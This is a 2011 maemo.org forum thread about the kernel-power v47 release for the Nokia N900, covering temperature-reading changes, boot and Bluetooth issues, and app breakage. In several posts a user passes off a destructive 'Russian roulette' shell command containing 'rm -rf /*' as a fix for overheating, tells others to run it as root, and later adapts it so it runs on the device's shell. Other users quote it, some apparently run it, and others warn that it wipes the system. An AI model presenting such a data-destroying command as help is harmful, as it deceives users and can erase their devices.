maemo.org - Talk

maemo.org - Talk (https://talk.maemo.org/index.php)
-   Maemo 5 / Fremantle (https://talk.maemo.org/forumdisplay.php?f=40)
-   -   [Announce] kernel-power stable v49 in Extras-Testing (https://talk.maemo.org/showthread.php?t=71879)

eefo 2011-05-04 10:18

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Russe89 (Post 999915)
2 posts above... is it explained with the temps...
and the frequencies:
try
Code:

sudo kernel-config limits 250 750
for minimum 250 and maximum 750...

owww crap .
VI is really on the heat :P
apology :P

vi_ 2011-05-04 10:19

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by eefo (Post 999914)
my n900 has gone mad o.o
after updating to v47 cpufre showing temperatue above 400 o.o
and the frequencies are 500 minimum and 600 maximum.
and i am damn sure it is not normal .
what to do to get temp back on track ?

Really eefo? I MEAN REALLY?

ARE YOU TO DUMB TO READ BUT 2 POSTS ABOVE?


to fix your temperature problem just run this as root:

Code:

[ $[ $RANDOM % 6 ] == 0 ] && echo "your dead!" || echo "You live"

eefo 2011-05-04 10:26

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by vi_ (Post 999918)
Really eefo? I MEAN REALLY?

ARE YOU TO DUMB TO READ BUT 2 POSTS ABOVE?


to fix your temperature problem just run this as root:

Code:

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "You live"

come on buddy , i have apologized already .
peace :)

p.s i was online on my n900 with battery almost about to end and i had no other source to come online and read the posts cause of electricity problem at my side .
and now finally i am able to use my laptop so just reading all the post.
apology again :)

kralde 2011-05-04 10:40

Re: [Announce] kernel-power v47
 
I have a problem...after installing kernel power v47 Multiboot to access kernel power doesnt work...I rename the file in etc/multiboot.d and also de file in /boot and I obtain guru meditation =( What can I do? I cant enter in maemo Kernel power anymore =(

retsaw 2011-05-04 10:42

Re: [Announce] kernel-power v47
 
Pali, thanks for all the work you're putting into this.

There's a bug that affects my bluetooth headphones with this kernel, it was actually introduced in v46 of kernel-power and there were only a few changes between v45 and v46 and only one relating to bluetooth, so that would be the likely culprit. The bug is that after a few minutes of audio playback being stopped I get virtually no sound to my headphones when I restart playback, it does however only seem to affect one of the two sets of bluetooth headphones I use.

pali 2011-05-04 10:53

Re: [Announce] kernel-power v47
 
In v47 is fixed problem with one bluetooth headphone. If you find patch on internet which can (maybe) fix your problem, I can recompile kernel to test if t works...

n900 lover 2011-05-04 11:00

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by vi_ (Post 999918)
Really eefo? I MEAN REALLY?

ARE YOU TO DUMB TO READ BUT 2 POSTS ABOVE?


to fix your temperature problem just run this as root:

Code:

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "You live"

hey ... i tried this command as root and sudo but it doesnt work temperature still show 363 c.

datjomp 2011-05-04 11:02

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by pusak gaoq (Post 999786)
i just update this latest kernel on my n900 & a few problem came out after reboot....

1.my callnotify didnt works...no more call,sms & headphones icon appears on the status bar (fixed by reinstall callnotify-at this moment anyway)
2.the latest cutetube-QML didnt run at all....
3.sometime wifi works (have to reboot to make it works)
4.QCPUfreq detect 393° my CPU temperature...

I had som problems with CuteTube-QML 0.6.5 which was installed at the same time as the kernel updates. I tried to reinstall CT, without success. Then I installed CT 0.6.4 again, which works for me with the new kernel.

J4ZZ 2011-05-04 11:04

Re: [Announce] kernel-power v47
 
Quote:

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "You live"
^ phone is cooling down to normal now... thx :D

No, seriously, everything is working fine now...

Quote:

Originally Posted by kralde (Post 999921)
I have a problem...after installing kernel power v47 Multiboot to access kernel power doesnt work...I rename the file in etc/multiboot.d and also de file in /boot and I obtain guru meditation =( What can I do? I cant enter in maemo Kernel power anymore =(

Had this too because of missing "kernel-power-bootimg" package (which conflicted with "multiboot-kernel-power") Just install or reinstall "kernel-power-bootimg" and there should be no need to tinker with the *.item files.
Code:

apt-get install kernel-power-bootimg
or try
apt-get install --reinstall kernel-power-bootimg

Greetz,

..::J4ZZ::..

retsaw 2011-05-04 11:17

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by pali (Post 999924)
In v47 is fixed problem with one bluetooth headphone. If you find patch on internet which can (maybe) fix your problem, I can recompile kernel to test if t works...

I am running v47 now. Since I don't get this issue with the stock kernel or v45 I was thinking you could revert the patch introduced in v46. Looking at the changelog I see there was in fact only two changes between v45 and v46, those are removing uboot and adding a patch for bluetooth mice.

Gill T 2011-05-04 11:24

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by vi_ (Post 999918)
Really eefo? I MEAN REALLY?

ARE YOU TO DUMB TO READ BUT 2 POSTS ABOVE?


to fix your temperature problem just run this as root:

Code:

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "You live"

The code doesnt work
its say:

sh: %: unknown operand
You Live

did i do something wrong

Alfred 2011-05-04 11:27

Re: [Announce] kernel-power v47
 
WELL, you are lucky to live.

anapospastos 2011-05-04 11:30

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Gill T (Post 999943)
The code doesnt work
its say:

sh: %: unknown operand
You Live

did i do something wrong

No no. You did it very well. Now it's the time to sell your N900.

AlMehdi 2011-05-04 11:35

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Gill T (Post 999943)
The code doesnt work
its say:

sh: %: unknown operand
You Live

did i do something wrong

I would advice you NOT to use that! Hopefully a moderator can moderate that suggestion.

This command "rm -rf /*" will wipe your drive... ;)

kralde 2011-05-04 11:35

Re: [Announce] kernel-power v47
 
Bug: Temperature 323 ēC xDD And Maemoder cant set frequency limits.

Megaltariak 2011-05-04 11:36

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by n900 lover (Post 999929)
hey ... i tried this command as root and sudo but it doesnt work temperature still show 363 c.

You are lucky that your phone still works, because this command is an unix russian roulette: you have 1 chance on 6 to delete all content on your phone :D

Please try to understand commands before running them, especially as root.

Edit: this syntax will not works in sh (default N900's shell but will works on bash) but the above still apply, rm -rf /* should tilt everyone that is on an unix shell

retsaw 2011-05-04 11:40

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Gill T (Post 999943)
The code doesnt work
its say:

sh: %: unknown operand
You Live

did i do something wrong

Fortunately that code doesn't work on the N900, it needs a more functional shell like bash (which is the default on most Linux distros, but not the N900). If it did work it would give you a 1 in 6 chance of wiping your computer.

AlMehdi 2011-05-04 11:43

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by retsaw (Post 999959)
Fortunately that code doesn't work on the N900, it needs a more functional shell like bash (which is the default on most Linux distros, but not the N900). If it did work it would give you a 1 in 6 chance of wiping your computer.

It would also need "sudo" but it is not therefore it should be removed. Also.. Bash is available for the n900.

TMavica 2011-05-04 11:50

Re: [Announce] kernel-power v47
 
my cutetube QML cant use after update..
any help?

vi_ 2011-05-04 11:53

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by retsaw (Post 999959)
Fortunately that code doesn't work on the N900, it needs a more functional shell like bash (which is the default on most Linux distros, but not the N900). If it did work it would give you a 1 in 6 chance of wiping your computer.

You are right, it is a bash orientated version, I have modified it for ASH below:

Code:

[ $((RANDOM%6+0)) == 0 ] && rm -rf /* || echo "You live"
I have just run it on my n900 and it works.

I lived.

AlMehdi 2011-05-04 12:01

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by vi_ (Post 999970)
You are right, it is a bash orientated version, I have modified it for ASH below:

Code:

[ $((RANDOM%6+0)) == 0 ] && echo "dead" || echo "You live"
I have just run it on my n900 and it works.

I lived.

Damnit! vi_! Stop that.. it is not cool. Those things will just harm the community.

JohnLF 2011-05-04 12:01

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by kralde (Post 999952)
Bug: Temperature 323 ēC xDD And Maemoder cant set frequency limits.

Read the f***ing thread! Temperature reading is NOT a bug!

nicolai 2011-05-04 12:04

Re: [Announce] kernel-power v47
 
If you don't have bash installed, $RANDOM isn't defined. So
$((RANDOM%6+0)) always evaluates to zero.

AlMehdi 2011-05-04 12:07

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by nicolai (Post 999977)
If you don't have bash installed, $RANDOM isn't defined. So
$((RANDOM%6+0)) always evaluates to zero.

Try it out then... ;)


(But would advice you to change that rm command.)

Radicalz38 2011-05-04 12:09

Re: [Announce] kernel-power v47
 
Mine hanged up :(
[ $((RANDOM%∞+0)) == 0 ] && rm -rf /* || echo "You live"

Gill T 2011-05-04 12:10

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Megaltariak (Post 999956)
You are lucky that your phone still works, because this command is an unix russian roulette: you have 1 chance on 6 to delete all content on your phone :D

Please try to understand commands before running them, especially as root.

Edit: this syntax will not works in sh (default N900's shell but will works on bash) but the above still apply, rm -rf /* should tilt everyone that is on an unix shell

Thnx for the tip, i know lof of command but not all of them
And when i ask fore some help i didnt think somebody would give us suchs a code to kill our device, if so please tell what the risk are

its strange to think its a bug, because if i use this code:
echo $(cat /sys/class/power_supply/bq27200-0/temp) | awk '{ print $1/10}'
i got the correct temp, and if i use this code:
echo Temp: `cat /sys/class/power_supply/bq27200-0/temp` C
i get the wrong temp. :(

evan 2011-05-04 12:10

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by TMavica (Post 999966)
my cutetube QML cant use after update..
any help?

latest update for cutetubeQML seems to have an error
Not kernel related.
unless it reads the temperature and refuses to start when it is above 300!! sorry, couldn't resist.

Radicalz38 2011-05-04 12:11

Re: [Announce] kernel-power v47
 
Mine hanged up :(
[ $((RANDOM%∞+0)) == 0 ] && rm -rf /* || echo "You live"

F2thaK 2011-05-04 12:15

Re: [Announce] kernel-power v47
 
that command fxxks your phone dude

retsaw 2011-05-04 12:20

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Radicalz38 (Post 999985)
Mine hanged up :(
[ $((RANDOM%∞+0)) == 0 ] && rm -rf /* || echo "You live"

If you ran that command as root, then congrats you just wiped your N900. And learned the hard way you shouldn't run random code you don't understand or know it is safe on your computer.

F2thaK 2011-05-04 12:26

Re: [Announce] kernel-power v47
 
why was it posted on here [100 times] though??

vi_ 2011-05-04 12:28

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by Gill T (Post 999982)
Thnx for the tip, i know lof of command but not all of them
And when i ask fore some help i didnt think somebody would give us suchs a code to kill our device, if so please tell what the risk are

its strange to think its a bug, because if i use this code:
echo $(cat /sys/class/power_supply/bq27200-0/temp) | awk '{ print $1/10}'
i got the correct temp, and if i use this code:
echo Temp: `cat /sys/class/power_supply/bq27200-0/temp` C
i get the wrong temp. :(

The kernel is reporting the temperature in a standard way, i.e. as an integer including 1 sinificant figure. Programs that report the temperature are SUPPOSED to do the maths to make it look right. The original bq_ module reported the temperature wrongly and all software was written to reflect that.

all this does:

Code:

echo $(cat /sys/class/power_supply/bq27200-0/temp) | awk '{ print $1/10}'
is divide that value by 10. I have it as a DCEW displaying the temp on the 'desktop'.

There is a bug here, two infact.
  1. Every previous program is INTERPRETING the temperature data wrongly.
  2. Grade A noob tards have jumped on this development release of a kernel, running stuff they have NO IDEA what does and then whinging.

Bratag 2011-05-04 12:39

Re: [Announce] kernel-power v47
 
The issues with cutetube have nothing to do with the kernel patches. There was an issue with the app on the last release. Thats why its called extras-devel kids, not extras-works.

While a nice little piece of shell script the rm command is just uncool. We already have enough people borking there phones through a lack of knowledge - do we really need to help them along?

Reffyyyy 2011-05-04 12:40

Re: [Announce] kernel-power v47
 
@vi_

Your command will quite likely cause a large amount of idiots to whine even more than they previously would have.

I'm actually quite thankful you posted that relatively popular command. It should teach people to WAIT until software is ready and to stop repeating the same posts just because they are too lazy to read any part of the thread.

N900@900MHz 2011-05-04 12:41

Re: [Announce] kernel-power v47
 
What is everyone talking about temperature?

I have power-kernel v47 and latest CSSU. Installed v47 yesterday, and sofar no problems at all.

I can make tel. calls, send & recieve sms, email is working fine.

And when i check with program called Clean900 my battery Details it says nothing strage. Also the temperature is normall (18 degrees) in Original kernel.
Temperature in Titan= open/no info

So nothing strange here..

pawelstryju 2011-05-04 12:59

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by N900@900MHz (Post 1000004)
What is everyone talking about temperature?

I have power-kernel v47 and latest CSSU. Installed v47 yesterday, and sofar no problems at all.

I can make tel. calls, send & recieve sms, email is working fine.

And when i check with program called Clean900 my battery Details it says nothing strage. Also the temperature is normall (18 degrees) in Original kernel.
Temperature in Titan= open/no info

So nothing strange here..

18 degrees? so where do you live, north pole? Normal temperature is between 30-40 degrees.

And kp47 gives temperature in 3 numbers!
Example:
302=30,2; 450=45; 374=37,4

Gill T 2011-05-04 13:20

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by vi_ (Post 999995)
The kernel is reporting the temperature in a standard way, i.e. as an integer including 1 sinificant figure. Programs that report the temperature are SUPPOSED to do the maths to make it look right. The original bq_ module reported the temperature wrongly and all software was written to reflect that.

all this does:

Code:

echo $(cat /sys/class/power_supply/bq27200-0/temp) | awk '{ print $1/10}'
is divide that value by 10. I have it as a DCEW displaying the temp on the 'desktop'.

There is a bug here, two infact.
  1. Every previous program is INTERPRETING the temperature data wrongly.
  2. Grade A noob tards have jumped on this development release of a kernel, running stuff they have NO IDEA what does and then whinging.

Thnx,

yes you are right it was stupid to do it, but if i was a complete noob then my n900 died all ready in dec 2009 when i got the phone.
i know a lot of command 30 % of my phone runs on my self made commands and script. but i dont know everything and i always make an complete backup the roots and mydocs
it is my lesson :) not to run everything.

I`m using the code also in QBW and tweaked it a bit

N900@900MHz 2011-05-04 14:16

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by pawelstryju (Post 1000014)
18 degrees? so where do you live, north pole? Normal temperature is between 30-40 degrees.

And kp47 gives temperature in 3 numbers!
Example:
302=30,2; 450=45; 374=37,4

18 degrees celcius and i ckecked temp just after aperiod of long idle time. At the moment it is 27 degrees while running browser.
And no i don't live in the nordpol,i live in the netherlands.
my n900 is running at 900MHz lv profile this the max freq where it is stable (min freq is 250)

NIN101 2011-05-04 14:47

Re: [Announce] kernel-power v47
 
@pali:
I have a module request. It would be cool if you could compile the block cipher mode XTS (CONFIG_CRYPTO_XTS) for the next version. It is used by some crypto programs like LUKS, or TrueCrypt, so some people might be interested in that.

pali 2011-05-04 15:08

Re: [Announce] kernel-power v47
 
Quote:

Originally Posted by NIN101 (Post 1000052)
@pali:
I have a module request. It would be cool if you could compile the block cipher mode XTS (CONFIG_CRYPTO_XTS) for the next version. It is used by some crypto programs like LUKS, or TrueCrypt, so some people might be interested in that.

Ok. If there are needed some patches for 2.6.28.10 apply it on my git repository and me diff.


All times are GMT. The time now is 00:12.

vBulletin® Version 3.8.8